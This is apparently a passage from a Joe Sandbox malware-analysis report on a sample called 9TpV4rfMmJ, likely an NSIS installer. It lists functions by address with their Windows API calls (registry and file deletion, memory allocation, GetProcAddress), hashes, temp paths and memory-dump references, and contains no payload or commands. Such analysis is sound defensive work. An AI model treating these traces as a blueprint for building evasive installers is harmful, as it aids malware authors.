                                                                                                                      • Instruction Fuzzy Hash: E03190B2508112EFC7168F55CDC8D3A7BBFEB86340324452DF1429B1A4C739A865DB66
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2667972263-0
                                                                                                                      • Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                                                                                      • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                                                                                                                      • Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                                                                                      • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 716625C2
                                                                                                                        • Part of subcall function 716612CC: lstrcpynW.KERNEL32(00000000,?,7166137F,00000019,716611CA,-000000A0), ref: 716612DC
                                                                                                                      • GlobalAlloc.KERNEL32(00000040), ref: 71662548
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 71662563
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250687189467.0000000071661000.00000020.00000001.01000000.00000004.sdmp, Offset: 71660000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250687139142.0000000071660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250687238744.0000000071664000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250687268506.0000000071666000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_71660000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4216380887-0
                                                                                                                      • Opcode ID: c26ee3a76a6085bba8b76f1f96e8376402bcf57523a42289fd753b544b049a35
                                                                                                                      • Instruction ID: bdf3be31baea9f387f9f29d11f2551543dd3bb6aae8d06e7bdffa26e788d687a
                                                                                                                      • Opcode Fuzzy Hash: c26ee3a76a6085bba8b76f1f96e8376402bcf57523a42289fd753b544b049a35
                                                                                                                      • Instruction Fuzzy Hash: D741EEB1109306EFD725DF25D844A267BFEFB94310F10891EE8478B5D0EB30A598CBA2
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00402EFD
                                                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402F52
                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402F74
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseEnum$DeleteValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1354259210-0
                                                                                                                      • Opcode ID: af1d90332303fba62835883fab25b23baa283c20879225c9121ce07384c73772
                                                                                                                      • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                                                                                                                      • Opcode Fuzzy Hash: af1d90332303fba62835883fab25b23baa283c20879225c9121ce07384c73772
                                                                                                                      • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetDC.USER32(?), ref: 00401E51
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                                                        • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                        • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll,00000000), ref: 00406779
                                                                                                                      • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2584051700-0
                                                                                                                      • Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                                                                      • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
                                                                                                                      • Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                                                                      • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,716622D8,?,00000808), ref: 716616D5
                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,716622D8,?,00000808), ref: 716616DC
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,716622D8,?,00000808), ref: 716616F0
                                                                                                                      • GetProcAddress.KERNEL32(716622D8,00000000), ref: 716616F7
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 71661700
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250687189467.0000000071661000.00000020.00000001.01000000.00000004.sdmp, Offset: 71660000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250687139142.0000000071660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250687238744.0000000071664000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250687268506.0000000071666000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_71660000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1148316912-0
                                                                                                                      • Opcode ID: e8a2347c23617b15d5434b2e84063e52f504d6f75f9339047de59e2aeff72978
                                                                                                                      • Instruction ID: 519ab04b2fbf97878e295ecefc918f07ecf4e4fe381930824cb5009171010357
                                                                                                                      • Opcode Fuzzy Hash: e8a2347c23617b15d5434b2e84063e52f504d6f75f9339047de59e2aeff72978
                                                                                                                      • Instruction Fuzzy Hash: 70F0AC7320A1387BD6211BE78C4CD9BBE9CDF8B6F9B210215F628961A0C6619D11D7F1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Timeout
                                                                                                                      • String ID: !
                                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                                      • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                                                                      • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                                                                                                                      • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                                                                      • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                                                                      • wsprintfW.USER32 ref: 00404DF0
                                                                                                                      • SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                                      • String ID: %u.%u%s%s
                                                                                                                      • API String ID: 3540041739-3551169577
                                                                                                                      • Opcode ID: 1223352ea812f960516ff7c7a46bc26f2408d36098456295b3be4643145b8ca2
                                                                                                                      • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                                                                                                                      • Opcode Fuzzy Hash: 1223352ea812f960516ff7c7a46bc26f2408d36098456295b3be4643145b8ca2
                                                                                                                      • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nso8C9B.tmp,00000023,00000011,00000002), ref: 004024D5
                                                                                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nso8C9B.tmp,00000000,00000011,00000002), ref: 00402515
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso8C9B.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseValuelstrlen
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp
                                                                                                                      • API String ID: 2655323295-3684106442
                                                                                                                      • Opcode ID: a042c767b6986487cf95de5ddc7f1c8febd38642eeecd0575e21ea379906e559
                                                                                                                      • Instruction ID: a32c4fc66ba480c3aafb49ec1434dbeb720bd0d2787204a1d049ba7b64bbfaa1
                                                                                                                      • Opcode Fuzzy Hash: a042c767b6986487cf95de5ddc7f1c8febd38642eeecd0575e21ea379906e559
                                                                                                                      • Instruction Fuzzy Hash: 8B118E71E00119BEEF10AFA5DE49EAEBAB8FF44358F15443AF504F61C1D7B88D40AA58
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                                                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
                                                                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E
                                                                                                                      Strings
                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                      • API String ID: 2659869361-3355392842
                                                                                                                      • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                      • Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
                                                                                                                      • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                      • Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 71661171
                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 716611E3
                                                                                                                      • GlobalFree.KERNEL32 ref: 7166124A
                                                                                                                      • GlobalFree.KERNEL32(?), ref: 7166129B
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 716612B1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250687189467.0000000071661000.00000020.00000001.01000000.00000004.sdmp, Offset: 71660000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250687139142.0000000071660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250687238744.0000000071664000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250687268506.0000000071666000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_71660000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$Free$Alloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1780285237-0
                                                                                                                      • Opcode ID: 89f88d443dd3a5d4b3dca0540948459eaa9728e6df37214359b553aeed4aa937
                                                                                                                      • Instruction ID: 620ef808c940f20cdf7cc4c38070d164bd263466dfd1ccf2766f2ed3650c2dbd
                                                                                                                      • Opcode Fuzzy Hash: 89f88d443dd3a5d4b3dca0540948459eaa9728e6df37214359b553aeed4aa937
                                                                                                                      • Instruction Fuzzy Hash: E251B1F6908202DFE701CF6AC949A167BFCFB98355B108119F946DF2A4E730E990CB94
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll), ref: 00402695
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrlen
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp$C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll
                                                                                                                      • API String ID: 1659193697-3473229691
                                                                                                                      • Opcode ID: 055331aa1ecea8bfcda913bd06822b13da84f48a5f1a47c8ed214fd280e803f9
                                                                                                                      • Instruction ID: edf8e5a6553ae7ef136857fb61bcac29e22bbc78049b19fa22ca3c34260198f3
                                                                                                                      • Opcode Fuzzy Hash: 055331aa1ecea8bfcda913bd06822b13da84f48a5f1a47c8ed214fd280e803f9
                                                                                                                      • Instruction Fuzzy Hash: 2611EB71A00215BBCB10BFB18E4AAAE7665AF40744F25443FE002B71C2EAFC8891565E
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
                                                                                                                      • GetTickCount.KERNEL32 ref: 0040304A
                                                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                                                                                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2102729457-0
                                                                                                                      • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                                                                      • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                                                                                                                      • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                                                                      • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                                                        • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,76083420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76083420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                                                        • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                                                                        • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                                                      • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,76083420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76083420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                                                                                                                      • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,76083420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76083420,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                                                                                                                      Strings
